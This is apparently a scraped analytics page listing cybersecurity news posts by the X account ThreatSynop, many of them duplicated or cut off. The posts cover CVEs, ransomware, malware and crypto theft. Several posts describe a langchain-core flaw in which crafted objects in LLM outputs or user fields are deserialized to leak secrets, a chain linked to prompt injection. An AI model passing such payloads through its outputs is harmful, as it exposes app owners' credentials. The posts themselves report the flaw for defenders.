a Kindle Clone) Krono is a 6.13" E Ink Carta [----] (300 PPI) pocketable device running open Android (with Play Store access) and a Smart Dial for quick actions like voice-note capture plus built-in AI that transcribes/summarizes notesturning it into a low-distraction reader + productivity companion. For security teams its effectively an Android endpoint: treat it like any BYOD device (app permissions account hygiene and network segmentation) if it enters enterprise workflows. 🎯 Target: Global/Consumers &" [X Link](https://x.com/ThreatSynop/status/2007982397669712075) 2026-01-05T01:08Z [--] followers, [--] engagements "🚨 SwitchBot Smart Home [---] Goes Big at CES [----] With Onero H1 Household Robot + 3D Face-Mapping Lock Vision SwitchBot unveiled its Onero H1 wheeled humanoid home robot (22 DOF) using an on-device vision-language-action system to manipulate objects and coordinate with existing SwitchBot devices alongside the Lock Vision deadbolt that uses structured-light 3D facial mapping (and advanced biometrics on higher models) to reduce spoofing risk. The lineup signals a shift from single-purpose gadgets to an AI-orchestrated home ecosystemraising both convenience and IoT/privacy governance stakes for" [X Link](https://x.com/ThreatSynop/status/2007982948331483198) 2026-01-05T01:10Z [--] followers, [--] engagements "🚨 SANS Stormcast (Jan [--] 2026): MongoBleed & React2Shell Watchlist Crypto Scam TTPs DNS Timing and Legacy Fortinet Risk The episode recaps ongoing MongoBleed and React2Shell exposure highlights a classic advance-fee crypto scam luring victims with fake pending deposits and shares practical DNS response-time troubleshooting using tshark. It also flags that thousands of Fortinet devices remain unpatched against a five-year-old CVEunderscoring persistent firmware/patch governance gaps. 🎯 Target: Global/IT & Security (DB Network Firewall Admins) # Category: #SANS #Stormcast #MongoBleed" [X Link](https://x.com/ThreatSynop/status/2008007863797493771) 2026-01-05T02:49Z [--] followers, [--] engagements "🚨 Resecurity Honeytrap Turns Attackers Into Intel: ShinyHunters Allegedly Duped by Synthetic Data Resecurity reports it lured a threat actor into a controlled AI-generated honeypot loaded with realistic-but-fake datasets capturing tooling proxy infrastructure and OPSEC slips during large-scale scraping attempts. A later update claims ShinyHunters also fell for the decoys amplifying how deception can convert intrusion attempts into actionable IOCs/IOAs without exposing real production data. 🎯 Target: Global/Cybersecurity (Resecurity) # Category: #Honeypot #DeceptionTech #ThreatIntel" [X Link](https://x.com/ThreatSynop/status/2008015546529329643) 2026-01-05T03:19Z [--] followers, [--] engagements Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing
@ThreatSynop ThreatSynop
ThreatSynop posts on X about ai, microsoft, $googl, command the most. They currently have [---] followers and [----] posts still getting attention that total [-----] engagements in the last [--] hours.
Engagements: [-----] #
- [--] Week [-----] -6.80%
- [--] Month [------] +27%
- [--] Months [------] +30,212%
Mentions: [--] #
- [--] Month [-----] +36%
- [--] Months [-----] +29,283%
Followers: [---] #
- [--] Week [---] +17%
- [--] Month [---] +174%
- [--] Months [---] +5,100%
CreatorRank: [---------] #
Social Influence
Social category influence technology brands stocks finance countries social networks cryptocurrencies exchanges travel destinations automotive brands gaming
Social topic influence ai, microsoft, $googl, command #1296, reduce, target, data, crypto, systems #2228, agentic #1593
Top accounts mentioned or mentioned by @transilienceai @reactnativecommunitycli @vuln_tracker @reactrouternode @remixrunnode @remixrundeno @mailio @vietmoneyreactbigcalendar @60hz @adonisjsbodyparser @username @tenantonmicrosoftcom @gmailcom @aliceararau29 @ihackedthegovernment @lastpassserver8 @sr22vegascom @lmanchu @malwarebytes @reactnativecommunitycliserverapi
Top assets mentioned Microsoft Corp. (MSFT) Alphabet Inc Class A (GOOGL) Crowdstrike Holdings Inc (CRWD) Cloudflare, Inc. (NET) Zscaler Inc (ZS) IBM (IBM) ServiceNow Inc (NOW) Bitcoin (BTC)
Top Social Posts
Top posts by engagements in the last [--] hours
"🚨 : On Safer Internet Day February [--] [----] Trend Micro a global cybersecurity leader announced enhancements to its ScamCheck tool to help consumers identify potential scams and address growing AI threats like deepfakes. :: #Cybersecurity #ScamPrevention #AIThreats Is the News Cybersecurity-Related: Yes it focuses on enhancing tools to combat online scams and AI-driven threats. ☠ ( ):: Not specified. 🕷 ( ):: Not applicable. 🌐 ( ):: Global. 🕵 :: This is a new development building upon Trend Micro's ongoing efforts to combat online scams and emerging AI threats. 🔎 ::"
X Link 2025-03-17T20:40Z [--] followers, [--] engagements
"🚨 : The U.S. State Department's Global Engagement Center (GEC) established in [----] to counter foreign disinformation campaigns faced potential closure after its funding was omitted from the National Defense Authorization Act (NDAA) in December [----]. However subsequent legislative actions ensured the continuation of its functions under a new designation. :: #GovernmentPolicy #Disinformation #NationalSecurity Is the News Cybersecurity-Related: Yes as it pertains to governmental efforts in combating foreign disinformation which is a significant aspect of cybersecurity and information"
X Link 2025-03-17T21:18Z [--] followers, [--] engagements
"🚨 : CrowdStrike has achieved Federal Risk and Authorization Management Program (FedRAMP) authorization for several modules within its Falcon cybersecurity platform specifically for use in the GovCloud environment. These modules include Falcon Next-Gen SIEM Falcon for IT and Falcon Data Protection all now available to government entities requiring FedRAMP Moderate authorization. :: #Cybersecurity #FedRAMP #GovCloud #CrowdStrike Is the News Cybersecurity-Related: Yes it pertains to the authorization of cybersecurity modules designed to enhance the protection of government entities operating"
X Link 2025-03-17T21:18Z [--] followers, [--] engagements
"🚨 : Google's March [----] security update addresses [--] vulnerabilities affecting Android devices including two actively exploited flaws: CVE-2024-43093 A privilege escalation vulnerability in the Android framework with a CVSS score of [---]. Exploitation requires user interaction allowing attackers to gain elevated privileges without additional execution rights. CVE-2024-50302 : Details unspecified but noted as under limited targeted exploitation. The update includes two patch levels2025-03-01 and 2025-03-05to facilitate timely fixes across various devices. Users of Google Pixel devices"
X Link 2025-03-18T12:28Z [--] followers, [--] engagements
"🚨 : 🚨 Brief Summary of the News: Federal agencies are accelerating digital transformation efforts to meet public expectations and comply with mandates. Transitioning securely to platforms like Salesforce requires specialized assistance to ensure data protection and regulatory compliance. Companies like Own Company offer solutions focusing on secure development data recovery and long-term data archiving to support these modernization initiatives. # : #DigitalTransformation #Cybersecurity #DataProtection #GovernmentIT #Compliance Is the News Cybersecurity-Related: Yes. It discusses the"
X Link 2025-03-18T22:47Z [--] followers, [--] engagements
"🚨 : 🚨 CrowdStrike's Falcon platform has achieved Federal Risk and Authorization Management Program (FedRAMP) High Authorization enabling U.S. federal agencies public sector organizations and critical infrastructure entities to secure mission-critical systems and data against cyber threats. This authorization signifies compliance with the highest federal security standards allowing CrowdStrike to protect highly sensitive information across various sectors. # : #Cybersecurity #FedRAMPHigh #GovernmentSecurity #CloudSecurity #Compliance Is the News Cybersecurity-Related: Yes. It pertains to"
X Link 2025-03-19T18:49Z [--] followers, [--] engagements
"🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a critical vulnerability in HPE OneView that received a CVSS score of 10.0 the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform remote code execution with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :"
X Link 2025-12-19T00:47Z [--] followers, [--] engagements
"🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a critical vulnerability in HPE OneView that received a CVSS score of 10.0 the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform remote code execution with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :"
X Link 2025-12-19T00:50Z [--] followers, [--] engagements
"🚨 : 🚨 The Hacker News discusses the evolving need for dynamic AI SaaS security as organizations increasingly adopt softwareasaservice platforms powered by artificial intelligence. The article highlights challenges in securing AIenabled SaaS apps such as API exposure data leakage privilege escalation risks and the complexity of applying traditional security controls to dynamic AI workflows. It emphasizes proactive monitoring contextual access governance continuous anomaly detection and tailored security controls as essential elements for reducing risk in AIcentric SaaS environments. # :"
X Link 2025-12-19T00:53Z [--] followers, [--] engagements
"🚨 : 🚨 WatchGuard released urgent security updates for a critical Fireware OS vulnerability (CVE-2025-14733 CVSS 9.3) that is being actively exploited to achieve remote unauthenticated code execution via the IKEv2 VPN component (iked). The issue affects Mobile User VPN (IKEv2) and Branch Office VPN (IKEv2) when configured with a dynamic gateway peer and WatchGuard published fixed versions (e.g. 2025.1.4 12.11.6 12.5.15 and 12.3.1 Update [--] for FIPS). The company also shared indicators of attack/compromise such as abnormal IKE certificate-chain behavior unusually large CERT payloads and iked"
X Link 2025-12-20T23:39Z [--] followers, [--] engagements
"🚨 : 🚨 CISA added a critical ASUS Live Update vulnerability (CVE-2025-59374 CVSS 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation. The flaw is described as an embedded malicious code issue tied to a prior supply-chain compromise in which certain ASUS Live Update client versions were distributed with unauthorized modifications. The compromised builds could trigger unintended actions only on devices that matched specific targeting conditions and the incident is linked to the [----] Operation ShadowHammer campaign disclosed in [----]. ASUS stated the"
X Link 2025-12-20T23:39Z [--] followers, [--] engagements
"🚨 : 🚨 Cisco warned of active attacks exploiting an unpatched maximum-severity zero-day in Cisco AsyncOS (CVE-2025-20393 CVSS 10.0) affecting Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. Cisco said it became aware of the intrusion campaign on December [--] [----] and that only a limited subset of appliances appear affected with attackers gaining root-level command execution and deploying a persistence mechanism. Exploitation requires the Spam Quarantine feature to be enabled and internet-reachable (it is not enabled by default). Cisco observed the actor (UAT-9686) using"
X Link 2025-12-20T23:39Z [--] followers, [--] engagements
"🚨 : 🚨 SonicWall released patches for an actively exploited Secure Mobile Access (SMA) [---] series vulnerability (CVE-2025-40602) that allows local privilege escalation due to insufficient authorization in the Appliance Management Console (AMC). SonicWall said attackers have leveraged it in combination with the previously fixed critical flaw CVE-2025-23006 to achieve unauthenticated remote code execution with root privileges. Fixed hotfix builds were issued for affected SMA [---] versions and CISA added CVE-2025-40602 to its Known Exploited Vulnerabilities (KEV) catalog with a short remediation"
X Link 2025-12-20T23:39Z [--] followers, [--] engagements
"🚨 : 🚨 North Korealinked Kimsuky has been linked to a campaign distributing an updated Android malware variant called DocSwap via QR codes on phishing sites spoofing South Koreas CJ Logistics. Victims are lured through pop-ups and delivery-themed social engineering to install a fake security/shipment tracking app from an external server; the dropper decrypts an embedded encrypted APK launches a RAT service and uses decoy OTP-style verification before opening the real CJ Logistics tracking page to reduce suspicion. Once active the malware connects to an attacker server and supports dozens of"
X Link 2025-12-21T09:53Z [--] followers, [--] engagements
"🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a critical vulnerability in HPE OneView that received a CVSS score of 10.0 the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform remote code execution with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :"
X Link 2025-12-21T23:00Z [--] followers, [--] engagements
"🚨 Fake PoCs and AI Slop Are Polluting Vulnerability Response and Creating Dangerous False Negatives AI-generated and non-working proof-of-concept exploits are flooding high-profile vulnerability cycles (highlighted via the React2Shell CVSS [----] case) misleading defenders into thinking theyre safe because scanners built on bad PoCs return not vulnerable. The impact is delayed patching and mis-triage: teams deprioritize real risk while attackers iterate past broken public PoCs and exploit faster than organizations can remediate. 🔹 Key Details: Trend Micro tracked [---] public exploits for"
X Link 2025-12-21T23:12Z [--] followers, [--] engagements
"🚨 Askul RansomHouse Ransomware Breach Exposes 700K+ Records Disrupts Japan Logistics Operations Askul disclosed that a ransomware attack detected on October [--] [----] disrupted its highly automated order/shipping systems and led to the theft and leak of customer partner and employee data with RansomHouse claiming roughly 1TB of stolen files. This matters because it shows how credential-based intrusion plus backup destruction can turn a single enterprise incident into nationwide supply-chain disruption and mass PII exposure. 🕷 Malware: RansomHouse (ransomware / data-extortion) 🎯 Target: Japan"
X Link 2025-12-23T14:05Z [--] followers, [--] engagements
"🚨 Kimsuky Pushes DocSwap Android RAT via QR-Code Phishing Pages Posing as CJ Logistics Kimsuky is using delivery-themed phishing sites that force desktop visitors to scan a QR code leading Android victims to install a trojan SecDelivery.apk dropper that decrypts an embedded APK and launches DocSwap with full RAT control (including data theft and audio/camera/file ops) over an attacker server (27.102.137.181). This matters because it blends smishing/phishing QR redirection and convincing OTP-style decoys to bypass unknown sources warnings and turn routine parcel-tracking behavior into"
X Link 2025-12-24T15:04Z [--] followers, [--] engagements
"🚨 ProBit Global Alleged Breach: 700K User Records Offered for Sale on Cybercrime Forum A threat actor claims to be selling a database allegedly tied to ProBit Global containing [------] rows of user data for $2500 USDT including PII (names emails phone DOB full address) and banking details (bank/branch IFSC account holder/name/number). Treat this as unverified until ProBit confirms but the potential impact is high-risk identity fraud targeted phishing and financial-account abuse for affected users. 🕷 Malware: N/A 🎯 Target: South Korea/Cryptocurrency Exchange Users (Global user base) #"
X Link 2025-12-24T17:43Z [--] followers, [--] engagements
"🚨 SideWinder APT Impersonates Indias Income Tax Dept to Deliver DLL Side-Loaded Implant SideWinder (Rattlesnake/APT-C-17) is running a hyper-targeted phishing campaign that lures Indian victims to a fake Income Tax portal and delivers abusing a legit Microsoft Defender binary (SenseCE.exe) to side-load a malicious DLL (MpGear.dll) and stage a resident agent (mysetup.exe) that beacons to C2 while mimicking Chinese enterprise-tool protocols. The chain includes timezone-based geofencing and cloud-hosted payload delivery (URL shorteners + GoFile) to evade reputation-based controls. 🕷 Malware:"
X Link 2025-12-24T18:40Z [--] followers, [--] engagements
"🚨 Wonderland Android Malware Steals OTPs via Real-Time SMS Hijacking and Remote USSD Control Group-IB reports Wonderland targets Uzbekistan users with dropper-based infections that unpack an encrypted SMS-stealer locally (even without internet) then uses bidirectional WebSocket C2 to execute live commands like SMS sending notification suppression call-forwarding and arbitrary USSD requeststurning phones into remotely operated fraud agents. The operation also hardens itself with fast-changing app/package names anti-analysis checks (emulator/root/Frida) and resilient domain onboarding via a"
X Link 2025-12-24T18:53Z [--] followers, [--] engagements
"🚨 MacSync Stealer Levels Up: Signed + Notarized Swift Dropper Slips Past Gatekeeper Jamf reports MacSync Stealer is now delivered as a fully code-signed and notarized Swift application inside a fake DMG allowing it to pass Gatekeeper checks and quietly fetch/execute a second-stage script from /tmp with rate-limiting and anti-analysis hygiene. This shift materially lowers user friction and detection odds enabling faster credential/data theft under the cover of Apple trust signals. 🕷 Malware: MacSync Stealer 🎯 Target: Global/macOS Users # Category: #macOS #Malware #InfoStealer #MacSync"
X Link 2025-12-24T23:11Z [--] followers, [--] engagements
"🚨 Fake Phantom Shuttle Chrome VPN Extensions Run a Stealth Proxy MITM to Steal Credentials Socket reports two Phantom Shuttle () Chrome extensions have operated since [----] silently injecting hardcoded proxy credentials and forcing traffic for 170+ high-value domains through attacker-controlled proxies to capture logins cookies tokens and form data. The extensions also beacon every [--] seconds and periodically exfiltrate user emails and plaintext passwords creating immediate account-takeover and supply-chain risk (GitHub/npm/cloud consoles). 🕷 Malware: Phantom Shuttle (malicious Chrome"
X Link 2025-12-24T23:13Z [--] followers, [--] engagements
"🚨 U.S. Seizes to Disrupt $14.6M Bank Account Takeover Scheme The U.S. Justice Department seized a domain and credential database used as a control panel for criminals running malvertising-based bank account takeovers where fake Google/Bing ads redirected victims to counterfeit bank logins that captured credentials. The FBI has identified at least [--] victims so far with $28M attempted losses and $14.6M confirmed and investigators say the infrastructure supported the operation as recently as November [----]. 🕷 Malware: N/A 🎯 Target: USA/Finance (bank customers targeted via search-ad"
X Link 2025-12-24T23:50Z [--] followers, [--] engagements
"🚨 Cl0p Linked to University of Phoenix Breach Affecting 3.5M People The University of Phoenix is notifying roughly [---] million individuals after an August [----] intrusion attributed to the broader Cl0p extortion ecosystem with exposed data reportedly including high-risk identifiers such as SSNs and bank routing/account details. The key risk is downstream identity theft and financial fraud at scale amplified by highly targeted phishing using verified personal data. 🕷 Malware: Cl0p (extortion actor) 🎯 Target: USA/Education # Category: #DataBreach #Cl0p #Extortion #HigherEd #PII #IdentityTheft"
X Link 2025-12-24T23:58Z [--] followers, [--] engagements
"🚨 SEC Sues Crypto Investment Clubs That Used Deepfake Ads and WhatsApp to Steal $14M The SEC sued multiple entities behind WhatsApp-based investment clubs that used deepfake videos and fake professors to lure retail investors into opening accounts on sham crypto platforms (Morocoin Berge Cirkor) and buying fake offerings then demanded extra fees when victims tried to withdraw. The scheme allegedly ran Jan 2024Jan [----] and routed stolen funds through overseas banks and crypto wallets. 🕷 Malware: N/A 🎯 Target: USA/Finance (Retail Investors) # Category: #CryptoScam #SEC #InvestmentFraud"
X Link 2025-12-25T00:11Z [--] followers, [--] engagements
"🚨 SEC Charges Firms Behind $14M Crypto Scam Using Fake AI Signals in WhatsApp Investment Clubs The SEC alleges scammers used social-media ads to lure retail investors into WhatsApp investment clubs led by fake professors/assistants pushing supposed AI-generated trade tips then funneled victims to bogus crypto platforms and fake security token offerings before blocking withdrawals and demanding extra fees. At least $14M was stolen and moved offshore through bank accounts and crypto wallets highlighting how AI-themed credibility + closed messaging groups can scale fraud fast. 🕷 Malware: N/A"
X Link 2025-12-25T00:27Z [--] followers, [--] engagements
"🚨 Everest Ransomware Claims Breaches of Accela and Notin Threatening Massive Data Leaks Everest says it exfiltrated 1TB+ of internal Accela data (including tens of thousands of PDFs/CSVs and backup files) and 145GB from Spains containing sensitive legal workflows and identity documents indicating a high-impact double-extortion play. If validated this creates serious downstream risk for government permitting/licensing processes and notary-related identity theft and fraud. 🕷 Malware: Everest (ransomware / double-extortion) 🎯 Target: USA/GovTech + Spain/Legal Sector # Category: #Ransomware"
X Link 2025-12-25T01:04Z [--] followers, [--] engagements
"🚨 FBI Seizes Backend Panel Used to Run Bank Account Takeovers U.S. authorities seized the domain and its database after criminals used Google/Bing lookalike bank ads to funnel victims to phishing pages and store/operate thousands of stolen banking credentials for account takeover fraud. Investigators linked the scheme to at least [--] U.S. victims with $14.6M in losses (and $28M attempted) with infrastructure still active as recently as November [----]. 🕷 Malware: N/A 🎯 Target: USA/Finance # Category: #FBI #AccountTakeover #Phishing #Malvertising #CredentialTheft #FinancialFraud #DomainSeizure"
X Link 2025-12-25T02:08Z [--] followers, [--] engagements
"🚨 Microsoft Teams Adds Defender-Portal Controls to Block External Users and Domains Microsoft is rolling out an integration that lets security admins manage Teams external blocks (domains and specific email addresses) directly from the Microsoft Defender portal via the Tenant Allow/Block List with support for up to [----] domains and [---] emails. This centralizes response to phishing/spam and risky external contacts without changing existing federation/domain block settings in the Teams admin center. 🕷 Malware: N/A 🎯 Target: Global/Enterprise Collaboration (Microsoft Teams) # Category:"
X Link 2025-12-25T02:16Z [--] followers, [--] engagements
"🚨 Fortinet: 5-Year-Old FortiOS SSL VPN 2FA Bypass Now Actively Exploited Fortinet reports in-the-wild abuse of CVE-2020-12812 where attackers can bypass FortiToken 2FA by changing the usernames letter case under specific local user + remote auth (e.g. LDAP) configurations. Patch affected FortiOS releases and audit SSL-VPN auth logs for suspicious case-variant logins and unexpected successful sessions. 🕷 Malware: N/A 🎯 Target: Global/Organizations Running FortiOS SSL-VPN # Category: #Fortinet #FortiOS #SSLVPN #CVE202012812 #2FABypass #Authentication #VPN #PatchManagement #ThreatIntel 🔗"
X Link 2025-12-27T16:56Z [--] followers, [--] engagements
"🚨 ChatGPT Adds Formatting Blocks to Turn Drafts Into Rich-Text Task Editors OpenAI is rolling out formatting blocks that display outputs like emails/blog drafts inside a rich-text area with an inline toolbar (bold lists quotes alignment) letting users edit content directly in ChatGPT instead of copy/pasting into Word or Gmail. 🕷 Malware: N/A 🎯 Target: Global/ChatGPT Users # Category: #OpenAI #ChatGPT #AI #ProductUpdate #RichText #UX #Productivity 🔗 URL: https://www.bleepingcomputer.com/news/artificial-intelligence/chatgpts-new-formatting-blocks-make-its-ui-look-more-like-a-task-tool/"
X Link 2025-12-27T17:00Z [--] followers, [--] engagements
"🚨 Critical LangChain Flaw Lets Attackers Exfiltrate Secrets via Unsafe Deserialization A critical bug in langchain-core serialization (CVE-2025-68664) enables prompt/LLM-outputinfluenced data to trigger unsafe deserialization paths (e.g. logging/streaming/caching) leaking environment secrets (and potentially enabling further abuse such as SSRF via allowlisted classes). Patch by upgrading langchain-core (fixed in 0.3.81 / 1.2.5) and treat all LLM outputs as untrustedespecially where dumps()/dumpd() and event streaming are used. 🕷 Malware: N/A 🎯 Target: Global/AI Apps & LLM Agent Pipelines #"
X Link 2025-12-27T17:07Z [--] followers, [--] engagements
"🚨 Critical LangChain Serialization Injection Bug Exposes Secrets and May Enable Code Execution A critical flaw in langchain-core (CVE-2025-68664) lets attackers inject crafted lc structures so user-controlled data is treated as LangChain objects during deserialization enabling environment-secret extraction (e.g. when secrets_from_env is enabled) and potentially risky object instantiation paths. Update to langchain-core 1.2.5 or 0.3.81 and restrict deserialization via allowlists to reduce prompt-injection-to-secret-leak chains. 🕷 Malware: N/A 🎯 Target: Global/LLM Apps & Agent Pipelines"
X Link 2025-12-27T17:13Z [--] followers, [--] engagements
"🚨 LangGrinch: Critical LangChain-Core Bug Enables Secret Theft via Serialization Injection (CVE-2025-68664) Attackers can inject crafted lc-key objects through user-influenced fields (e.g. metadata additional_kwargs response_metadata) so dumps()/dumpd() content is later deserialized as trusted LangChain objects enabling environment secret extraction (and potentially RCE paths like Jinja2 templating). Upgrade langchain-core to 1.2.5 (or 0.3.81) and enforce the new allowlist-based allowed_objects defaults (with secrets_from_env now disabled). 🕷 Malware: N/A 🎯 Target: Global/LLM Apps & Agent"
X Link 2025-12-27T17:15Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Supply-Chain Attack Drains $7M in Crypto A compromised Trust Wallet Chrome extension update (v2.68.0 released Dec 24) injected obfuscated code to exfiltrate wallet secrets to a newly registered domain (api.metrics-trustwallet.com) leading to roughly $7M in theft; attackers also ran a parallel phishing campaign (fix-trustwallet.com) to trick users into surrendering seed phrases. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #Crypto #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #CryptoTheft"
X Link 2025-12-27T17:18Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Supply-Chain Hack Drains $7M from Users A compromised Trust Wallet Chrome extension update (v2.68.0 released Dec [--] 2025) contained obfuscated code that exfiltrated seed phrases on import to a look-alike domain enabling rapid wallet draining and parallel phishing via fake fix sites. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #IncidentResponse 🔗 URL: https://cybersecuritynews.com/trustwallet-chrome-extension-hacked/"
X Link 2025-12-27T17:24Z [--] followers, [--] engagements
"🚨 Chaos Ransomware Claims 150GB Leak From Italys Veplastic Chaos ransomware says it breached Veplastic (VEPLASTIC S.r.l.) and moved into the extortion/leak phase after listing the firm on its dark-web site with an alleged 150GB haul. The exposed dataset is described as including financials supplier/customer contracts and contacts proprietary compound formula/specs employee PII and internal communicationscreating both business disruption and IP/identity risk. 🕷 Malware: Chaos Ransomware 🎯 Target: Italy/Manufacturing (Plastics & Industrial Supply Chain) # Category: #Ransomware #Chaos"
X Link 2025-12-27T17:31Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Backdoor Drains $7M After Malicious v2.68 Release A malicious Trust Wallet Chrome extension update (v2.68) stole users decrypted mnemonic phrases during wallet unlock and exfiltrated them to api.metrics-trustwallet.com enabling attackers to drain funds ($7M) and launder via exchanges/bridges; Trust Wallet says the release was pushed using a leaked Chrome Web Store API key bypassing normal checks. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase"
X Link 2025-12-27T17:35Z [--] followers, [--] engagements
"🚨 China-Linked Evasive Panda Runs DNS Poisoning to Push MgBot via Fake Software Updates Kaspersky says Evasive Panda (StormBamboo/Bronze Highland) poisoned DNS responses to redirect legitimate update checks (e.g. SohuVA iQIYI IObit Tencent QQ even requests) to attacker infrastructure delivering a multi-stage loader that decrypts shellcode and installs the MgBot backdoor. This matters because DNS-layer manipulation can silently subvert trusted update flows across specific ISPs/regions enabling high-stealth espionage with minimal endpoint indicators. 🕷 Malware: MgBot 🎯 Target: Trkiye / China"
X Link 2025-12-27T17:37Z [--] followers, [--] engagements
"🚨 Aflac Confirms June Breach Impacting 22M+ Customers Aflac says an unauthorized actor accessed files on June [--] [----] (no ransomware contained within hours) and later determined the incident affected personal data tied to over [--] million individuals triggering large-scale notifications. The impact is high due to potential exposure of sensitive identity/insurance data that can drive fraud identity theft and targeted social engineering. 🕷 Malware: N/A 🎯 Target: USA/Insurance # Category: #DataBreach #Aflac #Insurance #PII #IdentityTheft #IncidentResponse #Cybercrime 🔗 URL:"
X Link 2025-12-27T17:40Z [--] followers, [--] engagements
"🚨 Fake Grubhub Holiday Crypto Promotion Emails Push 10x Bitcoin Scam Attackers sent unauthorized emails that appeared to come from Grubhubs legitimate subdomain urging recipients to send Bitcoin to a wallet with a false promise of a 10x payout; Grubhub says it contained the issue and is taking steps to prevent recurrence. 🕷 Malware: N/A 🎯 Target: Global/Grubhub merchant partners & recipients # Category: #CryptoScam #BusinessEmailCompromise #BrandImpersonation #Phishing #Fraud #EmailSecurity 🔗 URL:"
X Link 2025-12-27T17:44Z [--] followers, [--] engagements
"🚨 Trust Wallet Confirms Malicious Chrome Extension Update Caused $7M Crypto Theft Trust Wallet says a compromised Chrome extension release (v2.68.0 on Dec 24) included hidden code that exfiltrated wallet secrets to api.metrics-trustwallet.com enabling $7M in theft while attackers also pushed a fix-trustwallet.com phishing site to steal recovery phrases. Users should update to v2.69 immediately and move remaining funds to a new wallet/seed if they opened v2.68.0. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack"
X Link 2025-12-27T17:46Z [--] followers, [--] engagements
"🚨 Trust Wallet Urges Immediate Chrome Extension Update After $7M Losses Trust Wallet says a security incident affecting its Chrome extension v2.68 led to $7M in losses after malicious code decrypted users mnemonics (using the wallet password) and exfiltrated them to an attacker-controlled domain enabling rapid wallet draining; users must upgrade to v2.69 and beware of off-channel messages/phishing. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #IncidentResponse 🔗 URL:"
X Link 2025-12-27T17:51Z [--] followers, [--] engagements
"🚨 TeamViewer DEX NomadBranch Bugs Enable LAN RCE DoS and Data Exposure Multiple flaws in TeamViewer DEX Clients Content Distribution Service (NomadBranch.exe) can let an adjacent-network attacker bypass integrity checks for code execution (CVE-2025-44016) or crash/abuse the service for DoS and potential sensitive-data exposure (incl. CVE-2025-12687) fixed in 25.11.0.29 with hotfixes for select legacy branches. 🕷 Malware: N/A 🎯 Target: Global/Windows Enterprise (TeamViewer DEX on shared LAN) # Category: #TeamViewer #DEX #NomadBranch #CVE202544016 #CVE202512687 #CVE202546266 #RCE #DoS"
X Link 2025-12-27T17:55Z [--] followers, [--] engagements
"🚨 New MongoDB Flaw Lets Unauthenticated Attackers Read Uninitialized Heap Memory (CVE-2025-14847) A high-severity zlib compression parsing issue (length-field mismatch) can let unauthenticated clients trigger MongoDB to return uninitialized heap memory potentially disclosing sensitive in-memory data that aids further exploitation; upgrade to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #CVE202514847 #Vulnerability #InfoDisclosure #Zlib"
X Link 2025-12-27T17:59Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Supply-Chain Hack Leads to $7M Crypto Theft Attackers pushed a malicious Trust Wallet Chrome extension update (v2.68) that exfiltrated users decrypted seed phrases to attacker infrastructure enabling rapid wallet draining and millions in losses. Users should update to the fixed release and rotate wallets/seeds if they interacted with the compromised version. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #IncidentResponse #ThreatIntel 🔗 URL:"
X Link 2025-12-27T18:04Z [--] followers, [--] engagements
"🚨 MongoBleed PoC Drops: Unauthenticated MongoDB Memory Leak Now Easy to Exploit A new mongobleed PoC exploits CVE-2025-14847 by abusing MongoDBs zlib decompression handling (inflated uncompressedSize) to leak uninitialized heap memory over the network potentially exposing internal configs system stats paths and client details; patch to fixed MongoDB releases (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32) and watch for scanning on [-----]. 🕷 Malware: mongobleed (PoC exploit tool) 🎯 Target: Global/Database Infrastructure (MongoDB Cloud & Container Deployments) # Category: #MongoDB"
X Link 2025-12-27T18:08Z [--] followers, [---] engagements
"🚨 MongoBleed (CVE-2025-14847): Unauthenticated Heap-Memory Leak Hits MongoDB Servers MongoBleed abuses MongoDBs zlib compression handling to leak uninitialized heap memory to unauthenticated remote clients potentially exposing in-memory sensitive data and aiding follow-on exploitation. Patch to fixed MongoDB versions (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until upgraded. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #MongoBleed #CVE202514847 #Vulnerability #InfoDisclosure #Zlib #DatabaseSecurity"
X Link 2025-12-28T04:09Z [--] followers, [---] engagements
